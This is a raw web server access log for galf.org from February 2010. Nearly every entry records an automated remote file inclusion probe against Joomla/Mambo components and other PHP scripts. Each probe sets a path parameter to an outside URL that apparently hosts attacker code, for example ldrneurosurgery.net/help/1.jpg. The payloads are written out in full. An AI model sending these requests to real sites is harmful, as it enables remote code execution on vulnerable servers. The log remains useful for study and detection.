69.163.202.84 - - [07/Feb/2010:17:16:43 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [07/Feb/2010:17:16:43 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [07/Feb/2010:17:16:50 -0800] "GET /logs/access_100118.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:17:17:06 -0800] "GET /appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:17:17:06 -0800] "GET /logs//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:17:17:06 -0800] "GET /logs/access_090720.log//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:17:17:12 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.36.175.10 - - [07/Feb/2010:17:17:12 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.36.175.10 - - [07/Feb/2010:17:17:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [07/Feb/2010:17:20:18 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:08 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:08 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:10 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:10 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:11 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.36.175.10 - - [07/Feb/2010:17:21:15 -0800] "GET /logs/access_091116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:17:21:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:17:21:15 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:18 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:18 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:18 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:19 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:19 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:19 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:20 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.36.175.10 - - [07/Feb/2010:17:21:24 -0800] "GET /logs/access_100104.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:21:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:21:56 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:21:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:21:56 -0800] "GET /logs/access_090720.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:17:22:33 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:17:22:33 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:17:22:34 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:22:37 -0800] "GET /logs/access_090720.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:17:23:25 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.36.175.10 - - [07/Feb/2010:17:24:32 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:25:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:25:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:25:44 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:38 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:38 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:40 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:43 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:46 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:50 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:26:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:00 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:02 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:27:57 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.87.14.23 - - [07/Feb/2010:17:28:52 -0800] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:17:31:22 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:31:24 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:31:30 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:31:34 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:17:31:49 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:17:33:40 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /logs//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /logs/access_091123.log//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /logs//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /logs/access_091123.log//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:35:23 -0800] "GET /administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:36:00 -0800] "GET /logs/access_091102.log//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:36:02 -0800] "GET /logs/access_091102.log//administrator/components/com_phpshop/phpshop.cfg.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:37:00 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:37:00 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:37:00 -0800] "GET /logs/access_090720.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:17:42:46 -0800] "GET /logs/access_100118.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [07/Feb/2010:17:42:52 -0800] "GET /logs/access_090720.log//login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [07/Feb/2010:17:42:52 -0800] "GET /login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [07/Feb/2010:17:42:52 -0800] "GET /logs//login.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:32 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:32 -0800] "GET /logs/access_091123.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:32 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:39 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:39 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:47:39 -0800] "GET /logs/access_091123.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:48:47 -0800] "GET /logs/access_091123.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:49:16 -0800] "GET /logs/access_091123.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:49:27 -0800] "GET /logs/access_090907.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:17:49:37 -0800] "GET /logs/access_090907.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:50:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:50:51 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:50:51 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:55:14 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.192.139.164 - - [07/Feb/2010:17:55:59 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:17:56:00 -0800] "GET /appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:17:56:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:56:19 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.192.139.164 - - [07/Feb/2010:17:56:23 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:56:38 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:17:57:20 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.135.249.213 - - [07/Feb/2010:17:57:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.galf.org"
61.135.249.213 - - [07/Feb/2010:17:57:21 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:57:33 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.192.139.164 - - [07/Feb/2010:17:57:50 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:17:58:28 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:18:01:24 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:18:02:48 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:43 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:43 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:43 -0800] "GET /logs/access_090803.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:43 -0800] "GET /logs/access_091123.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:48 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:48 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:48 -0800] "GET /logs/access_090803.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:18:05:48 -0800] "GET /logs/access_091123.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:18:07:27 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:18:07:27 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:18:07:36 -0800] "GET /logs/access_090713.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:10:51 -0800] "GET /logs/access_090720.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:10:51 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
